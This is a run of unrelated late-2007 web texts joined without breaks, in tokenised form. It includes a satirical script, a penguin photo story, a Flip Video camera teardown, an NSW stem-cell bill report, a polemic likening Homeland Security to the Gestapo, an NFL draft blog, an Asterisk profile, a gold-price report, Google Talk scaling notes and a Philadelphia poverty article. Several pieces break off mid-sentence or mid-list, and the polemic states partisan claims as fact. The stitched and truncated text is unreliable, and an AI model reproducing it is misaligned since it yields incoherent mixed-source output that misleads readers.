( Man 1 : I 'm in ! )
In the year 2007 , Americans were dumber than dirt .
( Man 2 : Here in Iraq , the locals throw explosive metal cone roses to thank us for liberating them . )
Over time , however , the endless war in Iraq began to play a role in natural selection .
( Voice : Ow ! @ # % Rose ! )
Only idiots signed up : Only idiots died .
Back home , the average I.Q. soared .
( Man 3 : Low - quality American troops are taking the fun out of insurgency .
Half these guys die in car accidents ! ) 500 years later , the U.S. was in intellectual utopia of creativity and paragmatism .
( Man 4 : Working 5 hours a week rocks !
I just finished another 4 - D play ! )
( Man 5 : I 'll watch it on the mindset ! )
Which led them to ironically - a stupid decision .
( ManWhat are we idiots to do ?
Last updated at 21:33 23 October 2007
It is one of the most extraordinary sights
in nature : more than 10,000 King Penguins
standing shoulder to shoulder at St
Andrew 's bay on the island of South
Georgia , preparing to breed .
The 3ft tall creatures — part of a colony of
more than 100,000 on the Atlantic island
close to Antarctica — create a living
landscape of breathtaking scale and
colour .
Scroll down for more ...
The King Penguins lay their eggs in
late November , with a peak around
mid-December .
They do n't build nests —
instead the male and female of each
mating couple take it in turns to incubate a
single egg on their feet over the course of
two months .
When incubating they stand rooted to
the spot just a flipper 's length from the
next one .
The childcare is surprisingly
egalitarian : the male takes the first incubation
shift of two weeks , then the female takes the
next fortnight , after which they swap every three
or four days .
But it 's not just the urge to breed which impels
penguins to come ashore at certain times of the
year — sometimes they need to change their
clothes .
Feathers wear out and lose their insulating
properties , so their waterproof — and , for a bird
which does n't fly , surprisingly aerodynamic — suits
must be replaced .
After about 12 days of moulting on shore , they have
lost virtually all their vibrant plumage and stand
almost naked .
Slowly , their new feathers appear and after 30
days they are ready to go back into the water —
with a brand - new suit .
Perhaps the new outfit helps in finding a mate the following
year , because unfortunately the divorce rate
is high .
Only 19 per cent of the King Penguins
take up with the same mating partner
the following year .
Maybe they like a change — or perhaps they just can't tell
each other apart .
Pure Digital Flip Video Camera 512Mb F130W
Summary : Costs four times as much as the original disposable video camera , but you get what you pay for .
I 've been playing with this camera for a day now , it is by far the best thing to come out of Pure Digital .
But there are a few hacks I 'd like to see .
Physically I 'll want to add a tripod mount and macro lens .
Software - wise , it should be able to record more than 30 minutes on a 512 MB chip .
( There are two models , 30 minute and 60 minute / 1GB .
The diagnostic screen says " NAND 4 Gb " , meaning gigabits . )
I 'm still experimenting with the finer points of video codecs to allow playback of uploaded files .
I also miss my Mac Classic skin ( zipfile ) .
Comes with a nice black carry pouch , wrist strap and 5 ' TV out cable .
Cable has stereo connectors , but there are only enough pins for mono .
The camera also records in mono , so they probably parallel slave the two audio connectors .
The UI is the same , with the addition of a D pad .
This lets you watch / delete any video clip .
During playback , the volume is adjustable .
During recording , there is digital zoom .
The video is encoded 640x480 at 30 fps , in 3ivx .
There are some Windows and Mac installers preloaded to the camera 's memory .
Other hardware additions include a flip out USB connector , which appears as a mass storage device .
The batteries are finally easy to access .
The top of the unit still has the same connector as the older cameras , but is now covered with a spring loaded dust flap instead of a sticker .
The TV port is barely visible , next to the battery door hinge .
Pop out the four visible screws .
Lift the rear sticker and remove the fifth .
Be more careful than me and try to avoid cosmetic damage .
Mind your screws , the pair above and below the power button are shorter than the other three .
As in the disposable video cameras , the battery connector is a separate PCB .
The mainboard is attached by three more screws .
Thankfully the USB connector has its own header .
There are a large number of components with amusing names along the lines of CNEW2 , RNEW4 , etc .
The focus adjust is glued in place .
That bit of masking tape covers a possible short created by one of the springs .
Under the LCD is a small sticker .
It is printed CL72V3 over which is handwritten B15 .
The board is labeled part number 0016A7910L - B01 revision B1 .
There were no epoxy blobs , and there are a few sites which could be test points .
Chip labeling : RT9902 GQV 8L90K ZORAN ZR36460BGCG A2 X7AGP0714DQ COACH -8M ( handmarked e ) SAMSUNG 646 K4D551638H-LC50 D5516 WBJ43YPZU
( handmarked slash ) SAMSUNG 710 K9F4G08U0A BCB0 VHAD06PAC ( handmarked B7 )
When reassembling , do n't forget to remount the battery door spring .
This is the first Pure Digital camera I can freely recommend to friends and family .
At $ 80 it is a bit steep compared to their past offerings , but this camera Just Works .
It does n't frustrate , and you will actually get something done with it without first resorting to hackery .
Linkback : http://www.pages.drexel.edu/~kmk592/rants/flip-video/
Printer friendly links :
http://www.pages.drexel.edu/~kmk592/gallery/cgi/low/mac-classic-pack.gif
http://www.pages.drexel.edu/~kmk592/gallery/cgi/high/mac-classic-pack.zip
History : 2007/12/27 uploaded
The leader of the Catholic Church in Australia , Cardinal George Pell , says he regrets that a bill overturning a ban on therapeutic cloning has passed the lower house of NSW Parliament .
In a rare conscience vote , the bill allowing stem cell research , also known as somatic cell nuclear transfer , was today approved by the lower house 65 votes to 26 .
To become law , the bill must be debated and passed by the state 's upper house .
The Minister for Science and Medical Research , Verity Firth , said this would not happen until Parliament 's next session .
Cardinal Pell said he remained hopeful the bill would be defeated in the upper house .
" The Catholic Church supports adult stem cell research , especially for health cures , and remains opposed to the destruction of human life , " Cardinal Pell said in a statement .
" In our democracy , parliament legislates .
I regret the vote of the NSW Legislative Assembly on cloning and hope that the Legislative Council will be better informed . "
The cardinal said the Sydney Catholic Life Office was prepared to offer information to " any person who wishes to understand the pro-life position better " .
Cardinal Pell has come under attack by MPs after he said Catholic politicians who voted in favour of the bill could expect consequences for their place in the life of the church .
Emergency Services Minister Nathan Rees said yesterday the cardinal should apologise to Catholic MPs or risk comparisons to controversial Muslim leader Sheik Taj Aldin al - hilali .
A number of high profile MPs , including Premier Morris Iemma and his deputy John Watkins , are Catholic .
Both Mr Iemma and Mr Watkins voted in favour of the bill .
The NSW legislation mirrors that passed by the Commonwealth in December last year and is similar to a bill passed by Victoria 's Parliament in May .
Scientists hope their work with stem cells will yield significant medical breakthroughs within a decade .
Church leaders are allowed to express views : Howard
Cardinal Pell and Perth Archbishop Barry Hickey are entitled to express their views on stem cell research , Prime Minister John Howard said .
Archbishop
Hickey came under fire after he reportedly said Catholics who did not condemn the cloning of human embryos for medical research were acting against the teachings of the Catholic faith and may face excommunication .
Mr Howard today said he did not believe either man was trying to direct MPs on political matters .
" I think it 's exaggerating things to say that , '' he told ABC radio .
" I think that Cardinal Pell and Archbishop Hickey are both church leaders ; they are entitled to express their views and I respect both of them . "
Mr Howard said church leaders had not directed his decision to vote against overturning the ban on therapeutic cloning when legislation was before Federal Parliament last year .
The " no " voters were :
" Your papers please " has long been a phrase associated with Hitler ’s Gestapo .
People without the Third Reich ’s stamp of approval were hauled off to Nazi Germany ’s version of Halliburton detention centers .
Today Americans are on the verge of being asked for their papers , although probably without the " please . "
Thanks to a government that has turned its back on the U.S. Constitution , Americans now have an unaccountable Department of Homeland Security that is already asserting tyrannical powers over U.S. citizens and state governments .
Headed by the neocon fanatic Michael Chertoff , the Orwellian - sounding Department of Homeland Security has mandated a national identity card for Americans , without which Americans may not enter airports or courthouses .
There is no more need for this card than there is for a Department of Homeland Security .
Neither are compatible with a free society .
However , Bush , the neocons , Republicans , and Democrats do not want America to any longer be a free society , and they are taking freedom away from us just as they took away the independence of the media .
Free and informed people get in the way of power - mad zealots with agendas .
It is the agendas that are supreme , not the American people , who have less and less say about less and less .
George W. Bush , an elected president , has behaved like a dictator since Sept. 11 , 2001 .
If " our " representatives in Congress care , they have n’t done anything about it .
Bush has pretty much cut Congress out of the action .
In truth , Congress gave up its lawmaking powers to the executive branch during the New Deal .
For three - quarters of a century , the bills passed by Congress have been authorizations for executive branch agencies to make laws in the form of regulations .
The executive branch has come to the realization that it does n’t really need Congress .
President Bush appends his own " signing statements " to the authorizations from Congress in which the president says what the legislation means .
So what is the point of Congress ?
As for laws already on the books , the U.S. Department of Justice ( sic ) has ruled that the president does n’t have to abide by U.S. statutes , such as FISA or the law forbidding torture .
Neither does the president have to abide by the Geneva Conventions .
Other obstacles are removed by edicts known as presidential directives or executive orders .
There are more and more of these edicts , and they accumulate more and more power and less and less accountability in the executive .
The disdain in which the executive branch holds the separate and equal legislative branch is everywhere apparent .
For example , President Bush is concluding a long - term security agreement with the puppet government he has set up in Iraq .
Prior to Sept. 11 , 2001 , when the president became The Decider , a defense pact was a treaty requiring the approval of Congress .
All that is now behind us .
Gen. Douglas Lute , President Bush ’s national security adviser for Iraq , says that the White House will not be submitting the deal to Congress for approval .
Lute says Bush will not be seeking any " formal inputs from the Congress . "
" There is literally no question that this is unprecedented , " said Yale Law School Professor Oona Hathaway .
Bush can do whatever he wants , because Congress has taken its only remaining power  impeachment  off the table .
The Democratic Party leadership thinks that the only problem is Bush , who will be gone in one year .
Besides , the Israel Lobby does n’t want Israel ’s champion impeached , and neither do the corporate owners of the U.S. media .
The Democrats are not adverse to inheriting the powers in Bush ’s precedents .
The Democrats , of course , will use the elevated powers for good rather than for evil .
Instead of having a bad dictator , we ’ll have a good one .
by Justin Yost
Seems like a pretty simple decision looking at it now , but in 2000 the New England Patriots had a quandary on their hands .
Perhaps the decision might have made Tim Rattay the Greatest Quarterback of All Time or maybe the Pats would be struggling to make the playoffs , never mind Spygate !
But with the 199th pick of the 2000 NFL Draft the New England Patriots selected Tom Brady .
We all look back and marvel at the decision of selecting Brady that late given the hindsight , but at the time it seemed obvious .
Needless to say , there were some respectable picks in Round 6 , such as Pro-Bowlers Neil Rackers and current Patriot linebacker Adalius Thomas not to mention NFL currents Dhani Jones , Mike Anderson and Paul Edinger .
But the real question everyone asks is what about the quarterbacks selected before Mr. Brady ( six ) .
Some have had long careers , others are never - was - beens , but truth be told , there is little doubt any of them were of the NFL caliber of Tom Brady .
- Round 1 , Pick 18
You ca n’t really fault the New York Jets for taking Pennington here .
Chad was known as a smart , gutsy QB at Marshall ( Not to be confused with fellow Thundering Herd QB Byron Leftwich ) ; who ’s extreme accuracy made him an NFL prospect who eventually experienced some success in the NFL .
What Pennington did n’t have in physical ability , he made up for in toughness and intelligence and even , after a serious shoulder injury , returned to the NFL with a vengeance ; earning the Comeback Player of the Year Award .
But his shortcomings have been the bane of Jets fans current existence .
After leading the Jets to a 10 - 6 record in 2006 , Pennington has been relegated to the bench in 2007 , falling behind Kellen Clemens and out of favor with coach Eric Mangini and Jets fans everywhere ( see MetsJetsDevils )
Pennington married his college sweetheart Robin Hampton in 2001 and is backing up Kellen Clemens of the New York Jets
- Round 3 , Pick 65
Allow me to give you the Stat Line on Carmazzi ’s NFL career :
Alright , now that we ’re through with that we can go on .
Carmazzi was drafted by the San Francisco 49ers in the 3 rd round of the 2000 Draft , supposedly to back up , if not replace weak armed and savvy Jeff Garcia .
Needless to say , it never came to fruition , as Carmazzi was bounced to now defunct NFL Europa in 2001 , playing for the Rhein Fire and even took the Garcia route of getting some CFL time .
Carmazzi became a third stringer of the B.C. Lions behind another QB to be mentioned soon .
I honestly have no idea where Carmazzi is now .
- Round 3 , Pick 75
When Redman was drafted out of University of Louisville in 2000 , I went out on a limb proclaiming him the future starter and heir apparent for the Baltimore Ravens .
After watching the Louisville bomber have more completions than any other college QB at the time and being among the NCAA career leaders in yardage , I was all for Redman .
Unfortunately , in following in the footsteps of the two guys who happened to be above him in career yardage , Ty Detmer and the aforementioned Rattay .
At the very least , Redman earned a Super Bowl Ring in 2000 , as a third stringer for the Ravens .
He bounced around the league after suffering a season ending shoulder injury in 2003 , while relieving injured Kyle Boller , resurfaced in New England in 2004 , before being released prior to training camp .
Redman than latched onto the Tennessee Titans , but never saw an NFL down until 2007 when his old college ball coach Bobby Petrino signed him on to the Atlanta Falcons .
After the Michael Vick incident , the trading of Matt Schaub and the injury to D.J. Shockley Redman became the backup to Joey Harrington , eventually replacing him in week 12 and starting in week 13 , a loss to the New Orleans Saints .
Redman married high school girlfriend Ashley Britt and had his first child in 2007 .
He is currently listed as the Atlanta Falcons starting quarterback .
- Round 5 Pick 163
Tamaurice Nigel “ Tee ” Martin is not known for being an NFL quarterback , even though he did spend four seasons in the NFL ( the Pittsburgh Steelers , the team that drafted him , the Philadelphia Eagles and the Oakland Raiders ) .
What Martin did do was something former University of Tennessee Quarterback ( and fellow Brady Hater ) Peyton Manning never did , win an NCAA Championship , at Tennessee with Manning ’s team , no less .
Martin ’s team , complimented by running back Jamal Lewis and flanker Peerless Price won the 1998 NCAA Championship in college football , resulting in Martin , just like Manning , having a street in Knoxville named after him .
Martin also spent time in the CFL , much like his 2000 Draftee Brethren , resulting in two sub-par seasons with the Winnipeg Blue Bombers .
Martin played poorly during 2004 and 2005 , throwing for almost 500 yards and producing 1 touchdown to four interceptions .
Martin married Latoya Rodriguez in 2005 and is currently the quarterbacks coach for North Cobb High School in Kennesaw , GA .
- Round 6 , Pick 168
So , you could say , someone got it right with quarterbacks in the 2000 draft besides the Pats .
Unfortunately , it was n’t the New Orleans Saints , the team that drafted him .
Bulger led the West Virginia University Mountaineers for three seasons , setting over 30 team records and is amongst the most successful quarterbacks in school history .
New Orleans saw potential but was quickly booted by the Saints and then the Falcons ( who signed him next ) until he landed on the St. Louis Rams ’ practice squad .
As the magic wore off of Kurt Warner , fellow backup Jamie Martin filled in leading the Rams to an 0 - 5 record until he was injured and Bulger made an appearance .
Bulger was 6 - 0 in his starts but was injured against the Seattle Seahawks as the Rams puttered to a 7 - 9 season .
In 2003 Bulger lead the Rams in the playoffs and was officially declared the starter for the future in 2004 , as Warner was released .
He has been in the Pro-Bowl twice in his career has over 1,000 career completions , the fastest QB to ever reach that mark .
Bulger is currently the starting quarterback for the Rams .
- Round 6 , Pick 183
Spergon
Wynn was selected only 16 picks before a certain Michigan QB as a compensatory pick for the recently reformed Cleveland Browns .
Some compensation ?
Wynn played quarterback at Southwest Texas State , which is in the NCAA Football Sub- Division ( 1 - AA ) and was amongst the most successful QBs at the university .
Needless to say , it never translated .
Wynn did manage three starts in 2001 / 2 where he replaced injured Daunte Culpepper and Todd Bauman to complete the season for the Vikings .
Wynn the moved to Canada and the CFL in 2002 playing for the aforementioned B.C. Lions and serving as backup to Casey Printers but ahead on the depth chart to fellow 2000 draft alum and better QB than Brady Giovanni Carmazzi .
Wynn was then traded to the Winnipeg Blue Bombers and then the Toronto Argonauts .
Wynn was injured for most of 2005 and has yet to play seriously in the CFL .
Other QBs drafted in 2000 include Todd Husak , JaJuan Seider , Tim Rattay , Jarious Jackson , and Joe Hamilton .
Among the studs from the 2000 draft were Chris Samuels , Brian Urlacher , Bubba Franks , Shaun Alexander , Mike Brown , Laveranues Coles ( law ) , Dante Hall and of course Adalius Thomas .
Lest we forget duds Courtney Brown ( First overall ) , Peter Warrick , Heisman Trophy Winner Ron Dayne and thunderlegged Sebastian Janikowski .
Pictures Courtesy of :
Chad Pennington - Allposters.com
Giovanni Carmazzi – Viewimages.com
Chris Redman – Viewimages.com
Tee Martin – BenMaller.com
Marc Bulger – Honoluluadvertiser.com
In a research park outside the low - key bustle of downtown Huntsville , Ala .
Mark Spencer finishes his barbecue and resumes wreaking havoc on the multibillion - dollar phone equipment business .
Spencer is the inventor of Asterisk , a free software program that establishes phone calls over the Internet and handles voicemail , caller ID , teleconferencing and a host of novel features for the phone .
With Asterisk loaded onto a computer , a decent - size company can rip out its traditional phone switch , even some of its newfangled Internet telephone gear , and say good - bye to 80 % of its telecom equipment costs .
Not good news for Cisco , Nortel or Avaya .
" We have to figure out ways to get into everything : Carriers , businesses , equipment companies , " says Spencer .
" For better or worse , I do n't tend to think small . "
Spencer , who is all of 29 years old , is poised to disrupt the $ 7 billion market for office telecom switches ( often called PBXs ) much the way the Linux open - source computer operating system crushed the price of business computing and brought woe to established leaders such as Microsoft and Sun Microsystems .
Since Spencer released Asterisk to the world in 1999 as a phone operating system , it has been downloaded 500,000 times , and it continues to be downloaded 1,000 times per day .
Some 350 contributors have taken it from a rocky voice system to one with clear calling and more than 100 features .
Electric utility Southern Co. is using Asterisk in a pilot program to translate voicemail into text messages for 30 managers ' BlackBerrys .
The town of Manchester , Conn. is about to begin using Asterisk to run an application tied to the 911 service that will cost less than $ 1 million , half the price it would have paid had it used traditional phone equipment , and at 10 % of the operating costs .
Outsourcing company Sutherland Global Services has tested Asterisk in 400 - person call centers , finding it cuts telephone costs by two - thirds .
In Rensselaer , Ind. computer science professor Brian Capouch has built a commercial - class phone system that already touches 20 communities and covers more than 1,000 square miles with just $ 100 in personal computer equipment and $ 125 to customize each location .
For a little more he built an Asterisk system of motion detectors and Web cameras that send video to his office laptop and can call any phone when something happens at his house .
One of his students created a business sending other kids automated wake - up calls .
Other Asterisk hacks include a way to pay your parking meter by phone .
" You could n't set out to build a system like this .
No one company could do it all .
When you open source , people just keep improving things , " says Spencer .
Asterisk could lead to the creation of thousands of businesses , as people begin thinking about the phone the same way they saw the personal computer in 1980 , as a platform on which to build .
Spencer had this in mind when he named his software after the symbol used in Unix computer programming to signify " everything . "
Digium , the company Spencer created in 1999 , now has 50 employees and more than $ 10 million in revenue from selling hardware loaded with a tested business edition of the otherwise free Asterisk , much the way Red Hat ( nasdaq : RHAT - news - people ) charges for a widely used standard for Linux .
Digium makes a profit , though Spencer wo n't say how much .
Overhead is low .
Spencer pays less than $ 15 a square foot for space ( per year ) and does up his own quarters in geek chic : reworked computer guts , testing screens , a fridge filled with caffeinated sodas and a sculpture he made of a robot holding a rotary phone .
He shares his office with a 23 - year - old programmer who was still a teen when they met .
Spencer once had to write a note to his principal years ago when a job conflicted with the school day .
Spencer 's parents are professors at Auburn University ( his American father teaches education , his Egyptian mother French ) .
In eighth grade he wrote a grading program for his teacher and sold it for $ 5 .
While still in high school , Spencer hung around Auburn 's electrical engineering department , designing integrated circuit structures for fun .
" I 'd go over to his house [ to discuss semiconductors ] and he'd be finishing writing a symphony on his synthesizer , " says Thaddeus Roppel , an Auburn professor and early mentor .
" He kept up with his high school homework , too . "
While on a full scholarship at Auburn , Spencer started Digium as a Linux consultant .
He sold one - seventh of the firm for $ 500,000 to Adtran , a Huntsville telecom equipment maker where he had interned two years before .
He wanted a really cool phone switch to handle sales orders , but when he learned that it would cost $ 10,000 , he began writing Asterisk .
" I 'd never touched a traditional pbx , " Spencer says .
But he knew a ton about open - source software , whose source code is given away in order to attract improvements .
He had earlier built an instant - messaging client called Gaim , which has become popular among the open - source crowd .
Spencer based Asterisk on Apache , the freebie software that powers many a Web server .
Aided by a couple of Internet telephone veterans , he put the telephone switch at the center of the operating system and made it possible to connect it to almost any Internet phone system ( except Skype ) .
Asterisk was still a hobby until the spring of 2001 , when the tech crash killed Digium 's Linux business .
Spencer saw there was interest in Net phones and shifted gears .
By the end of the year Digium was selling computer cards with custom boards and Asterisk software .
Spencer is picking up a few big allies .
Intel now makes Asterisk - compatible cards for computers and has tested large deployments .
" Open source is one of the hottest topics in telecom today , " says Intel marketing director Timothy Moynihan .
Yet IBM , which styles itself a champion of all things open , will only say it has a " positive but very informal " relationship with Asterisk and Digium .
That distance may owe something to the fact that IBM resells Cisco 's Internet telephone gear to big firms like Ford and Dow Chemical .
In an internal study last summer Cisco identified 100 corporate customers making big use of Asterisk .
Open - source Internet phones , the document said , will force Cisco to excel in " reliability , productivity , enhancements , features , vendor reputation , service [ and ] support . "
Cost was unlikely to be Cisco 's selling point .
" I used to go on industry panels , and the guys from Cisco would be nice and baby me , never saying anything bad about Asterisk , " Spencer says .
" Lately they 've stopped seeing me as a charity .
It 's their business . "
Says Cullen Jennings , a senior Cisco engineer : " The bulk of PBXs that people deploy five years from now will not be open source , but that is just a guess . "
Either way , he figures that if Asterisk destroys Cisco 's valuable PBX business , Cisco can sell services and related networking gear based on it , the same way ibm embraced Linux - based computing .
Spencer hopes he does n't have to choose between spreading the Asterisk gospel or getting rich on Digium .
" The existing telephony business , for some companies , is going to get collapsed way down , " he says .
" What will be the new services ?
The new industries ?
Like a lot of things , you do this because it 's interesting , and you do n't really know where it 's going to go . "
[ Via - Uncommon Business Blog ]
Dumb But Profitable .
10 Million Dollar Ideas That Should n't Have Worked .
41 Money Facts That Will Blow You Away
Stupid Shit People ACTUALLY
Put On Their Resumes
10 Things You Did Not Know You Could Buy On Amazon .
Com
What If US Collapses ?
Soviet Collapse Lessons Every American Needs To Know
NEW YORK ( MarketWatch ) --
Gold futures closed at a new all - time high on Tuesday , soaring as high as $ 883.80 in intraday trading , as dollar weakness , rallying crude - oil prices and tensions between the United States and Iran boosted demand for the precious metal .
Silver and copper futures also posted strong gains .
Gold for February delivery hit an intraday high of $ 883.80 an ounce on the New York Mercantile Exchange , surpassing the previous record of $ 875 set on Jan. 21 , 1980 .
The contract surged $ 18.30 to end at $ 880.30 an ounce , a new all - time closing high .
Still , the new record high was considerably lower than the inflation adjusted peak of about $ 2,200 per ounce .
Spot gold also reached a record .
" Large funds and specs continue to buy and hold into this gold rally , and I believe that you will continue to see the trend of long gold , long crude continue throughout 2008 , " said Zachary Oxman , a senior trader at Wisdom Financial .
“ " I believe that you will continue to see the trend of long gold , long crude continue throughout 2008 . " ” — Zachary Oxman , Wisdom Financial
" Geopolitical worries are still forefront in traders ' minds along with continued dollar weakness , " Oxman said .
The dollar was mixed , as investors weighed weak home - sales data against remarks from a U.S. Federal Reserve official suggesting he would n't support a deeper cut to interest rates .
The dollar index , which tracks the performance of the greenback against a basket of other currencies , edged down 0.1 % to 76.095 .
See Currencies .
" Gold 's strength is likely due to buying on inflation hedging , credit crisis risk and general macroeconomic and geopolitical risk , " said Mark O'Byrne , director of Gold and Silver Investments Ltd. , in a research note .
" The incident in the strategically vital Strait of Hormuz highlights that geopolitical risk remains heightened , " he said .
Five Iranian speedboats harassed three U.S. Navy ships over the weekend in the Strait of Hormuz , according to media reports .
The Iranian boats approached the U.S. vessels and threatened in a radio transmission to blow them up .
The U.S. ships were about to open fire when the Iranian boats retreated .
U.S. Secretary of State Condoleezza
Rice said that the actions of the Iranian boats were provocative and dangerous , while Iran described the event as " an ordinary occurrence , " the BBC reported on Tuesday .
Crude - oil futures rose 2 % , rebounding from their steep decline in the previous session , amid expectations for an eighth consecutive drop in U.S. crude supplies .
See Futures Movers .
" Deepening recession and earnings jitters increases our conviction in gold , which seems well positioned for early - 08 by virtue of investment demand , competitive currency devaluations , and the reflation trade amply on display in oil , " said John Hill , an analyst at Citigroup , in a research note dated Jan .
6 . He expects strong safe - haven demand for gold in the event of US recession , and a test of $ 1,000 an ounce at some point .
There is upside risk to Citigroup 's gold forecasts of $ 750 in 2008 , $ 800 in 2009 and $ 820 in 2010 , Hill said .
He sees significant value in gold equities and has selected Barrick Gold Corporation ABX , +1.93 % as his top pick into 2008 .
" Looking out to mid-year , we favor copper as the most defensive , yet aggressively pro-cyclical , China - centric industrial metal , " Hill said .
Also on Nymex , other metals futures posted strong gains .
March silver rose 52.50 cents , or 3.4 % , to end at $ 15.815 an ounce and January platinum surged $ 29.40 , or 2 % , to $ 1,553.60 an ounce .
March palladium rose $ 4.95 at $ 381.80 an ounce .
March copper rallied 15.75 cents , or 5 % , to end at $ 3.2985 a pound .
Metals stocks surge
Indexes tracking mining and metals shares rallied on Tuesday .
The Philadelphia Gold and Silver Index XAU , +1.17 % rose 3.2 % at 188.43 points .
The CBOE Gold Index GOX rallied 3.9 % at 196.17 points and the Amex Gold Bugs Index HUI , surged 4.2 % at 454.11 points .
As for sector 's exchange - traded funds , the StreetTracks Gold Trust ETF GLD , +0.84 % rose 2.4 % at $ 86.78 , the iShares Silver Trust ETF SLV , +2.18 % gained 3.6 % at $ 155.90 and the Market Vectors - Gold Miners ETF GDX , +1.28 % rallied 3.6 % at $ 50.80 .
Gold warehouse inventories rose by 49,538 troy ounces to stand at 7.4 million troy ounces as of late Monday , according to Nymex data .
Silver stockpiles dropped by 761,765 troy ounces to stand at 132.6 million troy ounces as of late Friday , while copper supplies edged down 160 short tons to 14,931 short tons .
These are my notes from the talk Lessons in Building Scalable Systems by Reza Behforooz .
The Google Talk team have produced multiple versions of their application .
There is
a desktop IM client which speaks the Jabber / XMPP protocol .
a Web - based IM client that is integrated into GMail
a Web - based IM client that is integrated into Orkut
An IM widget which can be embedded in iGoogle or in any website that supports embedding Flash .
Google Talk Server Challenges
The team has had to deal with a significant set of challenges since the service launched including
Support displaying online presence and sending messages for millions of users .
Peak traffic is in hundreds of thousands of queries per second with a daily average of billions of messages handled by the system .
routing and application logic has to be applied to each message according to the preferences of each user while keeping latency under 100ms .
handling surge of traffic from integration with Orkut and GMail .
ensuring in - order delivery of messages
needing an extensibile architecture which could support a variety of clients
Lessons
The most important lesson the Google Talk team learned is that you have to measure the right things .
Questions like " how many active users do you have " and " how many IM messages does the system carry a day " may be good for evaluating marketshare but are not good questions from an engineering perspective if one is trying to get insight into how the system is performing .
Specifically , the biggest strain on the system actually turns out to be displaying presence information .
The formula for determining how many presence notifications they send out is
total_number_of_connected_users * avg_buddy_list_size * avg_number_of_state_changes
Sometimes there are drastic jumps in these numbers .
For example , integrating with Orkut increased the average buddy list size since people usually have more friends in a social networking service than they have IM buddies .
Other lessons learned were
Slowly Ramp Up High Traffic Partners :
To see what real world usage patterns would look like when Google Talk was integrated with Orkut and GMail , both services added code to fetch online presence from the Google Talk servers to their pages that displayed a user 's contacts without adding any UI integration .
This way the feature could be tested under real load without users being aware that there were any problems if there were capacity problems .
In addition , the feature was rolled out to small groups of users at first ( around 1 % ) .
Dynamic Repartitioning :
In general , it is a good idea to divide user data across various servers ( aka partitioning or sharding ) to reduce bottlenecks and spread out the load .
However , the infrastructure should support redistributing these partitions / shards without having to cause any downtime .
Add Abstractions that Hide System Complexity : Partner services such as Orkut and GMail do n't know which data centers contain the Google Talk servers , how many servers are in the Google Talk cluster and are oblivious of when or how load balancing , repartitioning or failover occurs in the Google Talk service .
Understand Semantics of Low Level Libraries : Sometimes low level details can stick it to you .
The Google Talk developers found out that using epoll worked better than the poll / select loop because they have lots of open TCP conections but only a relatively small number of them are active at any time .
Protect Against Operational Problems : Review logs and endeavor to smooth out spikes in activity graphs .
Limit cascading problems by having logic to back off from using busy or sick servers .
Any Scalable System is a Distributed System : Apply the lessons from the fallacies of distributed computing .
Add fault tolerance to all your components .
Add profiling to live services and follow transactions as they flow through the system ( preferably in a non-intrusive manner ) .
Collect metrics from services for monitoring both for real time diagnosis and offline generation of reports .
Recommended Software Development Strategies
Compatibility is very important , so making sure deployed binaries are backwards and forward compatible is always a good idea .
Giving developers access to live servers ( ideally public beta servers not main production servers ) will encourage them to test and try out ideas quickly .
It also gives them a sense of empowerement .
Developers end up making their systems easier to deploy , configure , monitor , debug and maintain when they have a better idea of the end to end process .
Building an experimentation platform which allows you to empirically test the results of various changes to the service is also recommended .
PHILADELPHIA ( Reuters ) - Many of the poorest people in the United States are still struggling to recover from the effects of a recession that ended six years ago , making them very vulnerable as the country stands on the brink of a new downturn .
Philadelphia resident Mattie McQueen leaves her home in a government - assisted housing project in Philadelphia , Pennsylvania , October 19 , 2007 .
Many of the poorest people in the United States are still struggling to recover from the effects of a recession that ended six years ago , making them very vulnerable as the country stands on the brink of a new downturn .
REUTERS / Tim Shaffer
In 2006 , the latest year for which Census Bureau figures are available , 12.3 percent of Americans were living in poverty , compared with 11.7 percent in 2001 , the year of the last recession .
“ It ’s unusual in an economic recovery that ... we still have poverty higher than it was in the recession that preceded it , ” said Sharon Parrott , a policy analyst for the Center on Budget and Policy Priorities , a liberal think tank in Washington .
This shows the poor have largely missed out on the gains made when the economy was expanding , Parrott said .
The recent expansion was “ much stronger for the people at the top than for people at the bottom . ”
Few places illustrate this more readily than Philadelphia .
Mattie McQueen , 43 , put off paying her phone bill in December so she could afford a few Christmas treats for herself and her 1 - year - old granddaughter , who lives with her .
“ You ’ve got to rob Paul to pay Peter , ” she said .
By holding on to the $ 162 that she owed the phone company , McQueen , a resident of South Philadelphia , was able to buy turkey , chicken , collard greens , and a few toys for her granddaughter , Mayliyah .
Without the budget adjustment , it would have been a cheerless Christmas dinner .
BELOW POVERTY
McQueen , who is diabetic and unemployed , lives on welfare payments of $ 637 a month from the City of Philadelphia , another $ 102.50 every two weeks in supplementary social security for her granddaughter , and $ 89 a month in food stamps .
Slideshow ( 2 images )
That adds up to an annual income a little over $ 11,000 , well below the $ 13,690 set by the federal government as the official poverty level for a family of two .
She spends $ 319 a month in rent , $ 425 a month on groceries , and $ 60 for the phone .
She says she ca n’t afford to use public transportation , and sometimes has to borrow money from family members to make ends meet .
She has had help with child care from Episcopal Community Services , a church - based social services organization .
Formerly homeless and now living in public housing , McQueen would seem to be far removed from the worries of some more affluent people hit by the foreclosure crisis gripping the United States , people who bought their own homes in the last few years but now find they cannot afford the mortgage payments .
But the foreclosure crisis is making itself felt throughout the U.S. economy and threatening to send the United States into recession , which is often defined as a decline in economic growth for two or more successive quarters .
That is bad news for poor people like McQueen and the other 354,000 people in Philadelphia -- or 25.1 percent of the city ’s population -- who live at or below the official poverty line .
“ Historically , when the economy falters and unemployment rises , we see an increase in poverty , ” Parrot said .
Predictions of a new recession mean that poverty rates are likely to start rising again without ever recovering to the level they were at during the last recession , which ended in November 2001 .
Poverty advocates like the Center on Budget and Policy Priorities note that two rounds of tax cuts by Congress during the administration of U.S. President George W. Bush have failed to trickle down to the nation ’s poor .
Philadelphia ’s poverty rate , almost twice the national average , is the highest among the 10 largest U.S. cities .
For young people under 18 , the poverty rate rises to 35.3 percent , while almost a fifth of the city ’s over 65 - year - olds fall below the poverty line .
Blacks , about half of the city ’s overall population , make up almost a third of the poor .
EDUCATION
Sister Mary Scullion , a Catholic nun who has worked with homeless people in Philadelphia for more than 30 years , said the city ’s shelters are now operating at 115 percent of capacity .
She blamed the rise in poverty on a range of factors including the loss of manufacturing jobs , low wages , rising housing costs , and an influx of ex-offenders from overpopulated prisons .
But she said deteriorating public education is the most important cause of poverty in a city where 24 percent of high school students leave before graduating , and whose schools were taken over by the state in 2001 because of their widespread failure to meet required standards .
“ When I was in high school , education was pretty much available to every child , ” she said .
“ Today , there is such an increase in resources going into private education . ”
